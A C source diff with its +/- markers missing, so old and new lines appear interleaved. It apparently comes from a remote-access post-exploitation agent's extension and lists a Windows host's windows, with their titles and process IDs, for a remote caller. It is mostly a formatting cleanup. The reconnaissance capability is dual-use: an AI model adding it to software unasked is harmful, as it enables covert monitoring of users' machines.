VOID add_enumerated_window(Packet *pResponse, QWORD qwHandle, const char* cpWindowTitle, DWORD dwProcessId);
DWORD enumerate_windows(Packet *response, BOOL bIncludeUnknown, QWORD parentWindow);
#ifdef _WIN32
@ -14,11 +14,11 @@ DWORD enumerate_windows( Packet *response );
#define MAX_WINDOW_TITLE 256
/*! @brief EnumChildWindows function pointer type. */
typedef BOOL (WINAPI * PENUMCHILDWINDOWS)( HWND hWndParent, WNDENUMPROC enumProc, LPARAM lparam );
typedef BOOL(WINAPI * PENUMCHILDWINDOWS)(HWND hWndParent, WNDENUMPROC enumProc, LPARAM lparam);
/*! @brief GetWindowTextA function pointer type. */
typedef int (WINAPI * PGETWINDOWTEXA)( HWND hWnd, LPSTR lpString, int nMaxCount );
typedef int (WINAPI * PGETWINDOWTEXA)(HWND hWnd, LPSTR lpString, int nMaxCount);
/*! @brief GetWindowThreadProcessId function pointer type. */
typedef DWORD (WINAPI * PGETWINDOWTHREADPROCESSID)( HWND hWnd, LPDWORD lpdwProcessId );
typedef DWORD(WINAPI * PGETWINDOWTHREADPROCESSID)(HWND hWnd, LPDWORD lpdwProcessId);
/*! @brief Container type used to maintain state across EnumChildWindows callback calls. */
typedef struct _EnumWindowsState
@ -29,39 +29,40 @@ typedef struct _EnumWindowsState
PGETWINDOWTHREADPROCESSID pGetWindowThreadProcessId; ///< Pointer to the GetWindowThreadProcessId function.
} EnumWindowsState;
BOOL CALLBACK enumerate_windows_callback( HWND hWnd, LPARAM lParam )
BOOL CALLBACK enumerate_windows_callback(HWND hWnd, LPARAM lParam)
{
char windowTitle[MAX_WINDOW_TITLE];
DWORD dwThreadId = 0;
DWORD dwProcessId = 0;
EnumWindowsState* pState = (EnumWindowsState*)lParam;
dprintf( "Enumerated window %x", hWnd );
dprintf("Enumerated window %x", hWnd);
do
{
dprintf( "Getting window title %p", pState->pGetWindowTextA );
if( pState->pGetWindowTextA( hWnd, windowTitle, MAX_WINDOW_TITLE ) == 0 ) {
dprintf( "Unable to get window title. Setting to <unknown>." );
if( pState->bIncludeUnknown ) {
strncpy_s( windowTitle, MAX_WINDOW_TITLE, "<unknown>", MAX_WINDOW_TITLE - 1 );
} else {
dprintf("Getting window title %p", pState->pGetWindowTextA);
if (pState->pGetWindowTextA(hWnd, windowTitle, MAX_WINDOW_TITLE) == 0) {
dprintf("Unable to get window title. Setting to <unknown>.");
if (pState->bIncludeUnknown) {
strncpy_s(windowTitle, MAX_WINDOW_TITLE, "<unknown>", MAX_WINDOW_TITLE - 1);
}
else {
break;
}
}
dprintf( "Getting process ID %p", pState->pGetWindowThreadProcessId );
dwThreadId = pState->pGetWindowThreadProcessId( hWnd, &dwProcessId );
dprintf("Getting process ID %p", pState->pGetWindowThreadProcessId);
dwThreadId = pState->pGetWindowThreadProcessId(hWnd, &dwProcessId);
dprintf(" Adding enumerated response" );
add_enumerated_window( pState->pResponse, (QWORD)hWnd, windowTitle, dwProcessId );
} while(0);
dprintf(" Adding enumerated response");
add_enumerated_window(pState->pResponse, (QWORD)hWnd, windowTitle, dwProcessId);
} while (0);
return TRUE;
}
#endif
DWORD enumerate_windows( Packet *response, BOOL bIncludeUnknown, QWORD parentWindow )
DWORD enumerate_windows(Packet *response, BOOL bIncludeUnknown, QWORD parentWindow)
{
#ifdef _WIN32
// currently we only support Windoze
@ -73,36 +74,36 @@ DWORD enumerate_windows( Packet *response, BOOL bIncludeUnknown, QWORD parentWin
do
{
dprintf( "Loading user32.dll" );
if( (hUser32 = LoadLibraryA( "user32.dll" )) == NULL)
BREAK_ON_ERROR( "Unable to load user32.dll" );
dprintf("Loading user32.dll");
if ((hUser32 = LoadLibraryA("user32.dll")) == NULL)
BREAK_ON_ERROR("Unable to load user32.dll");
dprintf( "Searching for GetWindowTextA" );
if( (state.pGetWindowTextA = (PGETWINDOWTEXA)GetProcAddress( hUser32, "GetWindowTextA" )) == NULL )
BREAK_ON_ERROR( "Unable to locate GetWindowTextA in user32.dll" );
dprintf( "Found GetWindowTextA %p", state.pGetWindowTextA );
dprintf("Searching for GetWindowTextA");
if ((state.pGetWindowTextA = (PGETWINDOWTEXA)GetProcAddress(hUser32, "GetWindowTextA")) == NULL)
BREAK_ON_ERROR("Unable to locate GetWindowTextA in user32.dll");
dprintf("Found GetWindowTextA %p", state.pGetWindowTextA);
dprintf( "Searching for GetWindowThreadProcessId" );
if( (state.pGetWindowThreadProcessId = (PGETWINDOWTHREADPROCESSID)GetProcAddress( hUser32, "GetWindowThreadProcessId" )) == NULL )
BREAK_ON_ERROR( "Unable to locate GetWindowThreadProcessId in user32.dll" );
dprintf( "Found GetWindowThreadProcessId %p", state.pGetWindowThreadProcessId );
dprintf("Searching for GetWindowThreadProcessId");
if ((state.pGetWindowThreadProcessId = (PGETWINDOWTHREADPROCESSID)GetProcAddress(hUser32, "GetWindowThreadProcessId")) == NULL)
BREAK_ON_ERROR("Unable to locate GetWindowThreadProcessId in user32.dll");
dprintf("Found GetWindowThreadProcessId %p", state.pGetWindowThreadProcessId);
state.pResponse = response;
state.bIncludeUnknown = bIncludeUnknown;
dprintf( "Searching for EnumChildWindows" );
if( (pEnumChildWindows = (PENUMCHILDWINDOWS)GetProcAddress( hUser32, "EnumChildWindows" )) == NULL )
BREAK_ON_ERROR( "Unable to locate EnumChildWindows in user32.dll" );
dprintf("Searching for EnumChildWindows");
if ((pEnumChildWindows = (PENUMCHILDWINDOWS)GetProcAddress(hUser32, "EnumChildWindows")) == NULL)
BREAK_ON_ERROR("Unable to locate EnumChildWindows in user32.dll");
dprintf( "Beginning enumeration of child windows with parent %u", parentWindow );
if( !pEnumChildWindows( parentWindow != 0 ? (HWND)parentWindow : NULL, (WNDENUMPROC)enumerate_windows_callback, (LPARAM)&state ) )
BREAK_ON_ERROR( "Failed to enumerate child windows" );
dprintf("Beginning enumeration of child windows with parent %u", parentWindow);
if (!pEnumChildWindows(parentWindow != 0 ? (HWND)parentWindow : NULL, (WNDENUMPROC)enumerate_windows_callback, (LPARAM)&state))
BREAK_ON_ERROR("Failed to enumerate child windows");
dwResult = ERROR_SUCCESS;
} while(0);
} while (0);
if( hUser32 )
FreeLibrary( hUser32 );
if (hUser32)
FreeLibrary(hUser32);
return dwResult;
#else
@ -110,61 +111,61 @@ DWORD enumerate_windows( Packet *response, BOOL bIncludeUnknown, QWORD parentWin
#endif
}
DWORD request_window_enum( Remote *remote, Packet *packet )
DWORD request_window_enum(Remote *remote, Packet *packet)
{
QWORD parentWindow = NULL;
QWORD parentWindow = 0;
DWORD dwResult = ERROR_SUCCESS;
BOOL bIncludeUnknown = FALSE;
Packet * response = packet_create_response( packet );
Packet * response = packet_create_response(packet);
do
{
if( !response ) {
dprintf( "Unable to create response packet" );
if (!response) {
dprintf("Unable to create response packet");
dwResult = ERROR_OUTOFMEMORY;
break;
}
// Extract the specified parent window. If this is NULL, that's ok, as we'll
// just enumerate top-level windows.
parentWindow = packet_get_tlv_value_qword( packet, TLV_TYPE_EXT_WINDOW_ENUM_HANDLE );
parentWindow = packet_get_tlv_value_qword(packet, TLV_TYPE_EXT_WINDOW_ENUM_HANDLE);
// Extract the flag that indicates of unknown windows should be included in the output
bIncludeUnknown = packet_get_tlv_value_bool( packet, TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN );
bIncludeUnknown = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN);
dprintf( "Beginning window enumeration" );
dwResult = enumerate_windows( response, bIncludeUnknown, parentWindow );
dprintf("Beginning window enumeration");
dwResult = enumerate_windows(response, bIncludeUnknown, parentWindow);
} while(0);
} while (0);
dprintf( "Transmitting response back to caller." );
if( response )
packet_transmit_response( dwResult, remote, response );
dprintf("Transmitting response back to caller.");
if (response)
packet_transmit_response(dwResult, remote, response);
return dwResult;
}
VOID add_enumerated_window( Packet *pResponse, QWORD qwHandle, const char* cpWindowTitle, DWORD dwProcessId, BOOL bVisible )
VOID add_enumerated_window(Packet *pResponse, QWORD qwHandle, const char* cpWindowTitle, DWORD dwProcessId)
{
Tlv entries[4] = {0};
Tlv entries[4] = { 0 };
dprintf( "Adding PID: %u", dwProcessId );
dwProcessId = htonl( dwProcessId );
entries[0].header.type = TLV_TYPE_EXT_WINDOW_ENUM_PID;
entries[0].header.length = sizeof( DWORD );
entries[0].buffer = (PUCHAR)&dwProcessId;
dprintf("Adding PID: %u", dwProcessId);
dwProcessId = htonl(dwProcessId);
entries[0].header.type = TLV_TYPE_EXT_WINDOW_ENUM_PID;
entries[0].header.length = sizeof(DWORD);
entries[0].buffer = (PUCHAR)&dwProcessId;
dprintf( "Adding Handle: %p", qwHandle );
qwHandle = htonq( qwHandle );
entries[1].header.type = TLV_TYPE_EXT_WINDOW_ENUM_HANDLE;
entries[1].header.length = sizeof( QWORD );
entries[1].buffer = (PUCHAR)&qwHandle;
dprintf("Adding Handle: %p", qwHandle);
qwHandle = htonq(qwHandle);
entries[1].header.type = TLV_TYPE_EXT_WINDOW_ENUM_HANDLE;
entries[1].header.length = sizeof(QWORD);
entries[1].buffer = (PUCHAR)&qwHandle;
dprintf( "Adding title: %s", cpWindowTitle );
entries[2].header.type = TLV_TYPE_EXT_WINDOW_ENUM_TITLE;
entries[2].header.length = (DWORD)strlen( cpWindowTitle ) + 1;
entries[2].buffer = (PUCHAR)cpWindowTitle;
dprintf("Adding title: %s", cpWindowTitle);
entries[2].header.type = TLV_TYPE_EXT_WINDOW_ENUM_TITLE;
entries[2].header.length = (DWORD)strlen(cpWindowTitle) + 1;
entries[2].buffer = (PUCHAR)cpWindowTitle;
dprintf( "Adding group to response" );
packet_add_tlv_group( pResponse, TLV_TYPE_EXT_WINDOW_ENUM_GROUP, entries, 3 );
dprintf("Adding group to response");
packet_add_tlv_group(pResponse, TLV_TYPE_EXT_WINDOW_ENUM_GROUP, entries, 3);
}